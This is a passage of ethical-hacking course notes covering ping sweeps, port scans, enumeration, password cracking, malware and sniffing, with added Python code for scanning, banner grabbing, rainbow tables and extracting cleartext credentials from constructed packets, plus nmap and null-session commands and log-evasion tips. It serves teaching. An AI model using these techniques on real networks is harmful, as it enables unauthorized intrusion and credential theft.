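def internet_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words; ICMP, IP, TCP and UDP all use it."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type: int, identifier: int, sequence: int, payload: bytes) -> bytes:
    """Pack an ICMP message with the checksum field first zeroed, then filled in."""
    header = ICMP_HEADER.pack(icmp_type, 0, 0, identifier, sequence)
    checksum = internet_checksum(header + payload)
    return ICMP_HEADER.pack(icmp_type, 0, checksum, identifier, sequence) + payload


def build_echo_request(identifier: int, sequence: int, payload: bytes = b"pingtest") -> bytes:
    """The packet ping sends; the id/sequence pair lets the sender match replies to requests."""
    return build_icmp(ICMP_ECHO_REQUEST, identifier, sequence, payload)


def parse_icmp(packet: bytes) -> dict:
    """Decode an ICMP message and verify its checksum (a valid message sums to zero)."""
    if len(packet) < ICMP_HEADER.size:
        raise ValueError("ICMP header is 8 bytes")
    icmp_type, code, _, identifier, sequence = ICMP_HEADER.unpack_from(packet)
    return {"type": icmp_type, "code": code, "id": identifier, "seq": sequence,
            "payload": packet[ICMP_HEADER.size:],
            "checksum_ok": internet_checksum(packet) == 0}


def make_echo_reply(request: bytes) -> bytes:
    """What a live host answers: type 0, same id, sequence and payload, checksum recomputed."""
    req = parse_icmp(request)
    return build_icmp(ICMP_ECHO_REPLY, req["id"], req["seq"], req["payload"])


def is_reply_for(request: bytes, candidate: bytes) -> bool:
    """A sweep marks a host 'up' only if a well-formed Echo Reply with matching id/seq comes back."""
    req, rep = parse_icmp(request), parse_icmp(candidate)
    return (rep["checksum_ok"] and rep["type"] == ICMP_ECHO_REPLY
            and rep["id"] == req["id"] and rep["seq"] == req["seq"])


def sweep_targets(cidr: str) -> list:
    """Host addresses a ping sweep of the block would probe (network and broadcast excluded)."""
    return [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]


# Sending requires socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
# and root/administrator; the kernel prepends the IP header. Replies arrive with the
# IP header attached, so the ICMP message starts at offset (first byte & 0x0F) * 4.
```

The checksum check is the part worth keeping: a sweep that trusts any packet with type 0 can be fooled by stray or corrupted replies, and matching id and sequence is what lets one process run many probes in parallel.
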
Angry IP Scanner
• Common scanner used to perform ping scans
• Can scan a range of IP addresses and their ports
• Pings each address to determine whether it’s alive
• Can scan a range of IP addresses extremely fast
• Can save results to a file for later use

Introducing Nmap
Nmap is used for everything from performing network inventory to security auditing as well as monitoring systems.
• Flexible
• Powerful
• Portable
• Easy
• Free
• Well documented
• Supported

What Is a Port Scan?
Port scanning has legitimate uses in managing networks, but it can also be malicious in nature if someone is looking for a weak access point to break into your computer.
• Used to identify the open and closed ports on a system
• A port is a virtual endpoint on a system
• Examples are port 80 for HTTP and 21 for FTP
• When combined with an IP address, they form a socket
• A socket identifies which service to connect to on a system
• Port scans allow an attacker to locate potential entry points

TCP and the Three-Way Handshake
TCP establishes connections and then verifies that each and every segment makes it to its destination in the right order. To accomplish this, TCP uses the three-way handshake (SYN, SYN/ACK, ACK) together with sequence numbers.
• Ports can be TCP or UDP.
• TCP is a connection-oriented protocol.
• The three-way handshake is used to establish a connection.
• The three-way handshake must complete before data is sent.
• The three-way handshake provides no security: nothing in it authenticates either party.
• TCP also provides sequence numbers for the reassembly of data.

User Datagram Protocol (UDP)
• UDP is stateless
• Much like TCP, UDP sends packets
• UDP does not make connections
• No guarantee that data will arrive at its destination
• Advantage is low overhead
• UDP scans are slower and less reliable than TCP scans: an open UDP port may simply not answer, while a closed one usually returns an ICMP port unreachable

TCP Flags
• SYN: Used to initiate a connection between two hosts in order to facilitate communications
• ACK: Used to acknowledge the receipt of data
• URG: States that the data contained in the packet should be processed immediately (the urgent pointer field is valid)
• PSH: Instructs the receiving system to push all buffered data up to the application immediately
• FIN: Tells the remote system that no more data will be sent; in essence this gracefully closes a connection
• RST: Represents a reset packet that is used to abort a connection

TCP Full Connect Scan
• Utilizes the three-way handshake
• Completed handshake indicates an open port
• RST in reply to the SYN indicates a closed port
• Scan gives the most accurate picture of port status
• Drawback is that the scan is easily logged, since the connection fully completes
• Command: nmap -sT -v <target IP address>

Half Open Scans
• Starts like a full connect scan
• Scan does not complete the final step of the handshake (the scanner answers the SYN/ACK with an RST instead of an ACK)
• Benefit is that the scan has a lower chance of being logged by the application, although firewalls and IDS still see the SYN
• Scan tends to be faster than full connect
• Requires raw-socket (root or administrator) privileges
• Command: nmap -sS -v <target IP address>

XMAS Scan
• A packet is sent with PSH, URG, and FIN all set at once
• Combination of flags is illogical and illegal
• Works because an RFC 793-compliant stack answers a closed port with RST and says nothing for an open port, so ports are reported as closed or open|filtered
• Does not work on most modern Windows systems and many network devices, which send RST regardless of port state
• Command: nmap -sX -v <target IP address>

FIN Scan
• Occurs when a packet is sent with only the FIN flag set
• Used to determine whether ports are open or closed, using the same RST-or-silence rule as the XMAS scan
• May not function on newer targets
• Can be blocked by some firewalls
• Command: nmap -sF -v <target IP address>

127
Fragmenting
• Fragmenting breaks up packets
• Fragments are reassembled by the target
• Packets are fragmented when they exceed a network's MTU
• Fragmenting can be used to evade detection by filters that inspect only the first fragment or do not reassemble before inspecting (nmap -f)

Banner Grabbing
Banner grabbing is an activity used to determine information about services that are running on a remote computer.
• Used to identify a system and its services
• Retrieves information from open ports and services
• Services respond to banner grabs with application-specific information
• Can use Telnet or Netcat to perform this task (for example, telnet <host> 25, or nc <host> 80 followed by a HEAD request)

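A connect scan followed by a banner grab, as an added example that is not part of the course notes and not a substitute for nmap or Netcat: a throwaway listener on 127.0.0.1 stands in for the target, the scanner completes the three-way handshake on each port (what nmap -sT does) and sorts ports into open, closed and filtered by how the connect attempt fails, and each open port is then asked for its banner. The SMTP-style banner text is made up.

```python
import socket
import threading

BANNER = b"220 mail.example.test ESMTP Postfix\r\n"   # constructed, SMTP-style greeting


def start_test_listener(banner: bytes = BANNER) -> int:
    """Bind an ephemeral loopback port and greet every client with a banner, like a mail daemon."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def free_port() -> int:
    """A loopback port nothing listens on: connects there are refused with RST."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """Full handshake per port. Refused (RST) -> closed; no answer -> filtered, usually a firewall."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                results[port] = "open"
            except ConnectionRefusedError:
                results[port] = "closed"
            except OSError:             # includes socket.timeout
                results[port] = "filtered"
    return results


def grab_banner(host: str, port: int, timeout: float = 1.0, probe: bytes = b"") -> str:
    """Connect, optionally send a probe (e.g. b'HEAD / HTTP/1.0\\r\\n\\r\\n' for web servers),
    and return the first thing the service says; that string is the raw material for version detection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            data = s.recv(1024)
        except socket.timeout:
            data = b""               # quiet service; try a protocol-specific probe next
    return data.decode("ascii", errors="replace").strip()


def scan_and_fingerprint(host: str, ports) -> dict:
    """Scan, then banner-grab each open port. Banners can lie; treat them as a lead, not proof."""
    report = {}
    for port, state in connect_scan(host, ports).items():
        report[port] = {"state": state,
                        "banner": grab_banner(host, port) if state == "open" else ""}
    return report


if __name__ == "__main__":
    listening = start_test_listener()
    for port, info in scan_and_fingerprint("127.0.0.1", [listening, free_port()]).items():
        print(port, info)
```

Because every probe completes a connection, the listener's accept log would show each one, which is the logging drawback the slides attribute to full connect scans; the banner grab adds a second, equally visible connection per open port.
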
Vulnerability Scanners
These tools function by checking code, ports, variables, banners, and many other potential problem areas, looking for issues.
• Used to identify known vulnerabilities
• Not typically stealthy
• Generally performed by automated means
• May only catch problems that are already known
• Not a good choice if trying to simulate a stealthy attack

Providing Cover with Proxies
• A proxy can lower the chances of detection
• Routes traffic through a machine acting as a proxy
• Can perform content filtering
• Can provide anonymizing services

Summary
• Scanning requires a good understanding of networking technologies.
• Ping sweeps locate live hosts; port scans (full connect, half open, XMAS, FIN) reveal open ports.
• Banner grabbing and vulnerability scanners add service and weakness details.
• Fragmentation and proxies can lower the chance of detection.
• Enumeration follows scanning.

6: Enumeration

What Is Enumeration?
• Gathers detailed information beyond scanning
• Uses different protocols such as SMB, SNMP, and LDAP
• Can create an effective picture of the network
• Relies on both manual and automated methods

Enumeration
You can expect to gain even more information during this step as you are digging deeper and gathering information such as usernames, host names, share names, services, application data, group information, and much more.
• Network resources and shares
• Users and groups
• Routing tables
• Auditing and service settings
• Applications and banners
• SNMP and DNS details

What to Uncover and How
The process of enumeration is finding out what services are running, including versions, open shares, account details, or possible points of entry. One such target is SMB.
• Using NULL sessions to extract information
• Enumerating Active Directory accounts
• Targeting routers

Ports of Interest
• TCP 53: DNS zone transfers (ordinary queries use UDP 53).
• TCP 135: Microsoft RPC endpoint mapper, used, for example, by Outlook to reach Exchange.
• UDP 137: NBNS provides name resolution services for the NetBIOS protocol.
• TCP 139: NetBIOS Session Service, or SMB over NetBIOS.
• TCP 445: SMB over TCP (Direct Host), without the NetBIOS layer.
• UDP 161: SNMP, a protocol used for network management.
• TCP/UDP 389: LDAP, used by many directory applications.
• TCP 3268: Global Catalog service of Active Directory (3269 for the SSL variant).
• TCP 25: SMTP, used for the transmission of messages.

NetBIOS
This service was originally intended to assist in access to resources on a LAN only.
• Commonly exploited service
• Designed for small networks
• Is extremely vulnerable
• Can be used to extract all sorts of information from a target
• Considered a legacy protocol
• Still available and running on Windows systems by default

NULL Sessions and NetBIOS
This feature is used to allow clients or endpoints of a connection to access certain types of information across the network:
• List of users and groups
• List of machines
• List of shares
• User and host SIDs

The NULL session allows access to a system using a special account known as a NULL user. The account can be used to reveal information about system shares or user accounts while not requiring a username or password to do so.

Working with NULL Sessions
• NULL sessions can be used to retrieve extreme amounts of information.
• Information includes user IDs, share names, security policy settings, users currently logged in, and more.
• Windows XP, Windows Server 2003, and later versions restrict anonymous access by default and are not vulnerable to null session attacks unless that restriction is relaxed.
• On older systems, patches won't fix the issue, and most hardening techniques won't keep it from being exploited; the remedy is configuration (the RestrictAnonymous setting), not a patch.

Using a NULL Session
• Requires a short list of commands
• Main command is the "net" command
• To establish a null session against the IPC$ share, use:
  net use \\<machine name>\IPC$ "" /user:""
• To view shares on a remote system, use:
  net view \\<machine name>
• To connect to a remote share, use:
  net use <drive letter> \\<machine name>\<shared folder name>

Extracting from SNMP
snmpwalk is an open source tool that is part of the Net-SNMP project, which traces its roots to the CMU SNMP code of the early 1990s, when SNMP was first deployed.
• Retrieves information from SNMP by walking the MIB tree with repeated GetNext requests
• Preys upon plaintext information: in SNMPv1 and v2c the community string is the only credential and it travels unencrypted
• Queries devices to determine whether information is kept secret, typically by trying default community strings such as "public" and "private"
• SNMP is an open standard, and the same data that informs administrators informs attackers

PsTools Suite for Enumeration
• PsTools made by Sysinternals (now Microsoft)
• Patterned after UNIX commands
• Tools allow for detailed exploration of a remote system
• Can perform many actions and tasks
• PsTools is a useful suite for both remote and local system assessment and exploitation.

Netcat for Enumeration
• Freeware utility
• Commonly used as a backdoor utility
• Can be used to push files from one system to another
• Can grab banners, do port scanning and port enumeration, and perform remote actions

What About Metasploit?
The Metasploit Framework was introduced as a research project by the well-known security researchers H.D. Moore and spoonm.
• Metasploit was designed for security research and assessments
• Contains numerous exploits to be used
• Can target applications and many operating systems
• Is command line (msfconsole) but also has a web interface

Summary
• Enumeration follows scanning.
• Enumeration seeks to reveal information from a system.
• Enumeration is an active measure.
• Information can include usernames, group information, printer data, and other data.

7: System Hacking

Gaining Access
• What is gaining access?
• Breaking passwords
• Opening up a system
• Can lead to further actions

Password Cracking
The ability to crack passwords is a required skill for you as a penetration tester, as passwords represent an effective way to gain access to a system.
• Passwords are the most widely used form of authentication.
• Usernames and passwords are a commonly targeted item.
• Enumeration may have gathered usernames in some cases.
• Password cracking is used to obtain passwords.
• Password cracking refers to a group of techniques.
• It is an essential skill for penetration testers.

What Makes a Password Susceptible to Cracking?
Passwords are intended to be something that is easy to remember but at the same time not easily guessed or broken. The following patterns shrink the keyspace an attacker has to search:
• Passwords that contain letters, special characters, and numbers but are short: stud@52
• Passwords that contain only numbers: 23698217
• Passwords that contain only special characters: &*#@!(%)
• Passwords that contain letters and numbers: meet123
• Passwords that contain only uppercase or only lowercase: POTHMYDE
• Passwords that contain only letters and special characters: rex@&ba
• Passwords that contain only special characters and numbers: 123@$4
• Passwords of 11 characters or less

Password Cracking Types
There are numerous techniques used to reveal or recover a password that you must explore, and each uses a different approach that can yield a password. Each method offers advantages and disadvantages that you should be familiar with.
• Passive online: sniffing
• Active online: brute force, guessing
• Offline: rainbow tables (and dictionary or brute-force attacks against captured hashes)
• Nonelectronic: social engineering

Passive Online
A passive online attack is any attack where the individual carrying out the process takes on a "sit back and wait" attitude.
• Passive attacks adopt a "sit back and wait" attitude.
• Packet sniffers are a common mechanism to gather passwords.
• Weak password protection schemes are at risk.
• Many protocols of older varieties are vulnerable.

Protocols Vulnerable to Sniffing
There are thousands of protocols that allow people to communicate via networks, and many of them can be used to break into those same networks because they carry credentials in cleartext.
• Telnet and rlogin (remote login): using these protocols, anyone on the path can read your keystrokes, passwords included.
• HTTP: sends usernames and passwords in cleartext (Basic authentication is only Base64-encoded, not encrypted).
• SNMP (v1 and v2c): like HTTP, it sends its community string password in cleartext.
• POP: sends passwords in cleartext.
• FTP: sends passwords in cleartext.
• NNTP: sends passwords in cleartext.
• IMAP: sends passwords in cleartext.
The secure replacements are SSH, HTTPS, SNMPv3, and the TLS-wrapped variants of POP, IMAP, FTP, and NNTP.

Tools for Passive Attacks
A network sniffer monitors data flowing over a network; it can be a software program or a hardware device with the appropriate software or firmware.
• Wireshark
• NetworkMiner
• Network Monitor
• Dsniff

Man-in-the-Middle
This type of attack takes place when two parties communicate with one another while a third party listens in.
• Designed to listen in on the communication between two parties
• Can be completely passive if the attacker just listens to the communication
• Becomes an active attack if the attacker modifies traffic or takes over the session
• Some protocols are vulnerable to sniffing

Active Online
Attacks that fit into this category are those that require direct interaction with a system in an attempt to break a password.
• Guessing
• Malware

Password Guessing
Password guessing is a valid and somewhat effective form of obtaining a password. During this process an attacker will attempt to gain a password by using a piece of software designed to test passwords against the live system; account lockout policies are the main obstacle.
Bad passwords commonly include:
• Pet's name
• Best friend
• Spouse's name
• Favorite show
• Date of birth
• Phone number

Using Malware
In February 2005, Joe Lopez, a businessman from Florida, filed a suit against Bank of America after unknown hackers stole $90,000 from his Bank of America account. The money had been transferred to Latvia. An investigation showed that Mr. Lopez's computer was infected with a malicious program, Backdoor.Coreflood, which records every keystroke and sends this information to malicious users via the Internet.
• Malware is a class of software with no beneficial use to its victim.

Using Malware
• Keyloggers are a good example of malware.
• Keyloggers can be used to gain countless pieces of information.

Offline
• Rainbow tables
• Use precomputed hashes to identify the password

What Is a Rainbow Table?
Rainbow tables are the end result of a process where every possible combination of characters within certain limits is generated, hashed, and stored, so that a captured hash can later be looked up instead of recomputed.
• Reduces the work of brute-force methods to a lookup
• Generates hashes for every possible password in the chosen keyspace
• Takes time (and disk) to create the table, but that cost is paid once
• Faster than other types of attacks once built
• Effective against LAN Manager hashes, which are unsalted and split the password into two 7-character uppercase halves
• Defeated by per-user salts, which make a precomputed table useless

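The offline attacks above in working form, as an added example that is not part of the course notes: a dictionary attack (one hash per guess), the keyspace arithmetic that makes short, single-class passwords weak, and a small rainbow table over four lowercase letters with MD5, including the column-dependent reduction function that gives the technique its name and a check that a per-user salt defeats the table. MD5 stands in for the LM hash of the slide; the wordlist, chain starts and passwords are made up, and since a real table covers the keyspace only probabilistically, the lookup is demonstrated on a password known to lie on one of the chains.

```python
import hashlib
import string
from typing import Optional

ALPHABET = string.ascii_lowercase
LENGTH = 4
KEYSPACE = len(ALPHABET) ** LENGTH          # 26**4 = 456,976 possible passwords


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def keyspace_size(charset_size: int, length: int) -> int:
    """Why 'only lowercase' and 'only digits' matter: 26**8 is about 2e11, 95**8 is about 6.6e15."""
    return charset_size ** length


def dictionary_attack(target_hash: str, wordlist) -> Optional[str]:
    """Hash each candidate and compare. Every attempt costs one hash, and nothing is reusable."""
    for word in wordlist:
        if md5_hex(word) == target_hash:
            return word
    return None


def reduce_hash(hex_digest: str, column: int) -> str:
    """Map a hash back into the keyspace. Mixing in the column index gives each chain position
    its own reduction function, which is what distinguishes rainbow tables from Hellman's
    original tables and keeps chains from merging as often."""
    n = (int(hex_digest[:12], 16) + column) % KEYSPACE
    letters = []
    for _ in range(LENGTH):
        n, r = divmod(n, len(ALPHABET))
        letters.append(ALPHABET[r])
    return "".join(letters)


def chain_elements(start: str, chain_len: int) -> list:
    """start -> hash -> reduce -> ...; returns the chain_len plaintexts whose hashes the chain covers."""
    elems, p = [], start
    for col in range(chain_len):
        elems.append(p)
        p = reduce_hash(md5_hex(p), col)
    return elems


def build_table(starts, chain_len: int) -> dict:
    """Only (endpoint -> starts) is stored; everything in between is recomputed during lookup."""
    table = {}
    for s in starts:
        p = s
        for col in range(chain_len):
            p = reduce_hash(md5_hex(p), col)
        table.setdefault(p, []).append(s)
    return table


def lookup(table: dict, target_hash: str, chain_len: int) -> Optional[str]:
    """For each column the hash might occupy, walk to the chain end; on a match, regenerate that
    chain from its start and return the plaintext sitting just before the target hash."""
    for col in range(chain_len - 1, -1, -1):
        p = reduce_hash(target_hash, col)
        for c in range(col + 1, chain_len):
            p = reduce_hash(md5_hex(p), c)
        for start in table.get(p, []):           # may be a false alarm: verify by regenerating
            for plaintext in chain_elements(start, chain_len):
                if md5_hex(plaintext) == target_hash:
                    return plaintext
    return None


def salted_lookup(table: dict, password: str, salt: str, chain_len: int) -> Optional[str]:
    """Salting changes the stored hash, so a table built for unsalted MD5 finds nothing."""
    return lookup(table, md5_hex(salt + password), chain_len)
```

The trade-off the slides describe is visible in the code: `build_table` does all the hashing once and stores one pair per chain, while `lookup` costs roughly chain_len squared reductions per hash but no table scan; the table is worthless as soon as the hash includes a salt.
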
Privilege Escalation
Not every system hack will initially provide an unauthorized user with full access to the targeted system. In those circumstances, privilege escalation is required.
• Increasing access for a compromised account
• Typically, the breached account will not have broad privileges
• Raising privileges to a level where more actions can take place
• Can be vertical or horizontal

Privilege Escalation Types
Privilege escalation is the process where the access that is obtained is increased to a higher level where more actions can be carried out. The reality is that the account accessed typically will end up being a lower privileged one and therefore one with less access.
• Vertical
  • Raising the privileges of an account that has already been compromised (for example, from a standard user to administrator or root)
• Horizontal
  • Moving from one compromised account to another account at the same privilege level, for instance to reach that user's data or a system where that user has rights

Tools for Privilege Escalation
• Active@ Password Changer
• Trinity Rescue Kit
• ERD Commander
• Kali Linux
• Parrot OS
• Windows Recovery Environment (WinRE)
• Windows Password Recovery
Most of these work offline, by booting the machine from other media and editing the local account database, which is why physical access controls and full-disk encryption matter.

Opening a Shell
LAN Turtle is a remote access pen testing tool. What LAN Turtle enables is the ability to perform several attacks such as man-in-the-middle, sniffing, and many others.
• Housed in a USB Ethernet adapter form factor
• Allows opening of a remote shell on a system
• With a shell open, commands can be transmitted to the remote system

Running Applications
When an attacker is executing applications on a system, they are doing so with specific goals in mind.
• Backdoors
• Crackers
• Keyloggers
• Malware

Covering Tracks
• Important step in removing evidence
• Leave no trace behind
• Eliminate or alter logs, error messages, and files
• More evidence or tracks means a greater chance of being detected

Working with Log Files
• Disabling auditing on a system prevents information from being recorded in the first place
• May prevent or slow detection
• Surgical removal of individual entries in log files is possible
A defender's counter is to forward logs to a separate collector as they are written, so that entries cannot be altered on the compromised host after the fact.

Alternate Data Streams
ADS was introduced into the Windows NTFS file system starting in Windows NT 3.1. It was implemented in order to allow compatibility with the Macintosh Hierarchical File System (HFS).
• Feature of the NTFS file system
• Allows for compatibility with the Macintosh file system
• Stores data in a nearly undetectable resource fork (written as file.txt:streamname)
• Tough to reveal the presence of a data stream; Explorer and a plain dir do not show it, and the file's reported size does not change
• Special software, or dir /r on Windows Vista and later, is required to list streams

Summary
• What the process looks like
• Steps to take
• Tools to use
• Information to be obtained

8: Malware

An Overview of Malware
Malware has quickly become one of the leading problems plaguing modern technology, with several million new forms of malware created every year (by some estimates around 1,200 new pieces are created each hour).
• Malware is an umbrella term for several forms of bad software.
• Malware has become more destructive and stealthy.
• It has evolved to more readily steal information.
• It may be useful, but it's potentially risky to use during a test.

Forms of Malware
Malware is anything that consumes resources and time while providing nothing in return and uses those resources to perform some operation that is counter to the system owner's best interests.
• Viruses
• Worms
• Trojan horses
• Rootkits
• Spyware
• Adware
• Ransomware

Authors of Malware
• Skilled programmers
• Criminals
• Casual users
• Students

A Closer Look at the Creators
• Students and newbies
• Younger computer users
• Professional and experienced programmers
• Researchers and testers

Virus Family Tree
When talking about viruses, it is important to understand that not all viruses are created equal; in fact there is a whole family of them.
• MBR virus
• File infector virus
• Macro virus
• Service injection virus
• Multipartite
• Polymorphic
• Encrypted

What Is a Worm?
Unlike their virus cousins, which require a host program to start their dirty work, worms just need a system to be vulnerable to start their own self-replicating process.
• Self-propagating malicious code
• Does not need user input
• Requires a system to be vulnerable
• Replicates and spreads
• Spreads rapidly

Worm Example: Slammer
• Doubled every 8.5 seconds for the first 3 minutes of life
• Ran 55 million scans per second at peak
• 75,000 infections in ten minutes
• Smaller in size than previous worms (a single 376-byte UDP packet)
• Generated random IP addresses
• Preyed on Microsoft SQL Server 2000 and MSDE systems via UDP port 1434

Spyware
This type of software operates in the background and out of a user's sight, quietly collecting information and transmitting it to its creator. Common delivery forms:
• Torrent sites
• Instant messaging
• Email attachments
• Physical access
• Browser add-ons
• Websites

Trojan Horses
• A host program is used as the carrier
• The host carries the malicious payload
• Stealthily drops off its payload
• Relies on social engineering to activate
By using another program as its carrier, the Trojan relies on what is known as social engineering, or taking advantage of human behavior, to carry out its actual infection.

What Do Trojans Do?
Because Trojans are so versatile and can go unnoticed, their popularity has exploded, and they've become the malware of choice for many online criminals.
• Create backdoors
• Spy
• Steal passwords
• Use your computer as a zombie
• Send SMS messages

Summary
• Types of backdoors
• Types of Trojans
• Categories of malware
• Malware creation kits
• Importance of keyloggers

9: Sniffers

What Is Sniffing?
Sniffers are a broad category that encompasses any utility that has the ability to perform a packet-capturing function.
• Is the act of viewing information as it flows over the network
• Can be performed with hardware or software
• Preys on vulnerable networks and protocols
• Passwords (from email, the Web, SMB, FTP, SQL, or Telnet)
• Email text

Law Enforcement and Sniffing
Lawful interception (LI) is defined as legally accessing communications and network data such as telephone calls or email messages.
• Lawful interception is legally sanctioned access to network data
• Must have authority in pursuit of evidence or analysis
• Regulated by the law
• Sometimes called wiretapping

Vulnerable Protocols
How successful you are at the sniffing process depends on the relative and inherent insecurity of certain network protocols. Insecure protocols include:
• SMTP
• HTTP
• rlogin
• Telnet
• NNTP
• POP
• FTP
• IMAP

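What sniffing these protocols actually yields, as an added example that is not part of the course notes and which also serves the earlier "Protocols Vulnerable to Sniffing" and "Extracting from SNMP" slides: the extractor below runs over a handful of constructed packet payloads (not a real capture) and pulls out an SNMPv1 community string by decoding the BER structure of the message, an HTTP Basic credential by Base64-decoding the Authorization header, and FTP/POP3 USER/PASS pairs matched per flow. The flow identifiers, hosts and credentials are made up; the SNMP packet is built by the block's own minimal encoder.

```python
import base64
import re

# ---- SNMPv1/v2c: the community string is a plain OCTET STRING right after the version field ----

def ber(tag: int, content: bytes) -> bytes:
    """Minimal BER TLV encoder (short-form length only, enough for small SNMP messages)."""
    assert len(content) < 128
    return bytes([tag, len(content)]) + content


def ber_read(buf: bytes, pos: int = 0):
    """Decode one TLV at pos -> (tag, content, next_pos); handles short and long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def snmpv1_get(community: bytes, oid: bytes, request_id: int = 1) -> bytes:
    """A GetRequest as snmpget/snmpwalk send it: SEQ { version, community, GetRequest-PDU }."""
    varbinds = ber(0x30, ber(0x30, ber(0x06, oid) + ber(0x05, b"")))
    pdu = ber(0xA0, ber(0x02, bytes([request_id])) + ber(0x02, b"\x00") + ber(0x02, b"\x00") + varbinds)
    return ber(0x30, ber(0x02, b"\x00") + ber(0x04, community) + pdu)


def snmp_community(packet: bytes):
    """Return {'version', 'community'} for v1/v2c, or None (SNMPv3 carries no community string)."""
    try:
        tag, body, _ = ber_read(packet)
        if tag != 0x30:
            return None
        vtag, ver, pos = ber_read(body)
        version = int.from_bytes(ver, "big")
        if vtag != 0x02 or version not in (0, 1):
            return None
        ctag, community, _ = ber_read(body, pos)
        if ctag != 0x04:
            return None
        return {"version": "v1" if version == 0 else "v2c",
                "community": community.decode("ascii", "replace")}
    except IndexError:
        return None


# ---- HTTP Basic: 'encoded' is not 'encrypted' ----

def http_basic_credentials(payload: bytes):
    m = re.search(rb"(?im)^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", payload)
    if not m:
        return None
    user, _, password = base64.b64decode(m.group(1)).decode("utf-8", "replace").partition(":")
    return user, password


# ---- Pulling everything together ----

def extract_credentials(captures) -> list:
    """captures: iterable of (flow_id, dst_port, payload). USER/PASS are matched per flow,
    which is how FTP and POP3 send them: two separate cleartext commands."""
    found, pending_user = [], {}
    for flow, port, payload in captures:
        if port == 161:
            info = snmp_community(payload)
            if info:
                found.append(("snmp", info["version"], info["community"]))
        elif port in (80, 8080):
            creds = http_basic_credentials(payload)
            if creds:
                found.append(("http-basic",) + creds)
        elif port in (21, 110):
            for line in payload.decode("ascii", "replace").splitlines():
                cmd, _, arg = line.strip().partition(" ")
                if cmd.upper() == "USER":
                    pending_user[flow] = arg
                elif cmd.upper() == "PASS" and flow in pending_user:
                    found.append(("ftp" if port == 21 else "pop3", pending_user.pop(flow), arg))
    return found


SYS_DESCR = bytes.fromhex("2b06010201010100")   # OID 1.3.6.1.2.1.1.1.0
SAMPLE_CAPTURE = [   # constructed payloads, not a real capture
    ("10.0.0.5>10.0.0.1", 161, snmpv1_get(b"public", SYS_DESCR)),
    ("10.0.0.5>10.0.0.20", 21, b"USER ftpuser\r\n"),
    ("10.0.0.5>10.0.0.20", 21, b"PASS ftp-secret\r\n"),
    ("10.0.0.5>10.0.0.30", 80, b"GET /admin/ HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
                                + base64.b64encode(b"alice:Winter2024!") + b"\r\n\r\n"),
    ("10.0.0.5>10.0.0.40", 110, b"USER bob\r\nPASS hunter2\r\n"),
]
```

This is the logic behind tools such as Dsniff: no cryptanalysis, only protocol parsing, which is why the countermeasure is to replace the protocol (SSH, HTTPS, SNMPv3, TLS-wrapped mail) rather than to harden the password.
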
A Quick Overview
Packet sniffing, or packet analysis, is the process of capturing any data passed over the local network and looking for any information that may be useful.
• Packet sniffing can capture any traffic flowing over a network that reaches the sniffer's interface.
• Packet sniffers are commonly used for troubleshooting purposes.
• Many tools are available to perform the process.
• The passive form is just like eavesdropping on a conversation.

What's Required to Sniff?
• Hardware in the form of a network adapter, usually placed in promiscuous mode so it accepts frames not addressed to it
• Driver program or the core sniffing program
• Buffer to temporarily store the results of a sniff
• Packet analysis capability to interpret results

A Selection of Sniffing Tools
• Wireshark
• tcpdump
• WinDump
• OmniPeek
• Dsniff
• EtherApe

Types of Sniffing
• Passive sniffing
  • Sniffing when a hub is present
  • Restricted to a network segment
  • Tends to be stealthier
• Active sniffing
  • Sniffing when a switch is present
  • Attempts to bypass the switch (MAC flooding, ARP spoofing)
  • Less stealthy

What Are Hubs?
• Central connection point for networks
• Traffic received on one port is repeated out through every other port
• Perform little to no filtering of traffic
• Slower and cheaper than switches
• Not common in modern networks

Network Switches
• Switches examine each frame
• Look at the source and destination MAC address of each frame
• Use that information to direct traffic
• Separate the network into collision domains
• Isolate network nodes from one another
When a frame is received by the switch, it reads the destination and source addresses and compares them to a table of ports and addresses (the CAM table) to pick the one port to forward out of.

Wireshark
• As of this writing, Wireshark reigns supreme as perhaps the best sniffer on the market.
• Wireshark has been around for quite a while, and it has proven its worth time and time again.
• Wireshark is natively available on Windows, Mac OS X, and Linux.

tcpdump
tcpdump is an open source network utility that is freely available under the BSD license.
• A command-line packet sniffer
• Intercepts traffic at the packet level and decodes TCP/IP
• Can send output to a file (tcpdump -w capture.pcap) for later analysis in Wireshark
• Known as being very fast and efficient

Active Sniffing Close-Up
When sniffing is performed in a switched network, it is called active sniffing.
• Active sniffing means the network has a switch instead of a hub.
• The switch actively regulates traffic, delivering each frame only to the port of its destination MAC address.
• The switch maintains a MAC address (CAM) table in memory to track which MAC address sits behind which port.
• Hosts use the Address Resolution Protocol (ARP) to learn the MAC address for an IP address, and that mapping is what the attacker manipulates.

MAC Flooding
A switch keeps track of MAC addresses it has seen by writing them to a content addressable memory (CAM) table. If a switch is flooded with frames from bogus MAC addresses, the CAM table fills up and the switch can no longer learn new addresses.
• Involves flooding the switch with numerous frames from fake source MAC addresses
• Overloads the CAM table in the switch
• Causes the switch to fail open and act like a hub, forwarding traffic for unknown destinations out of every port

ARP Spoofing
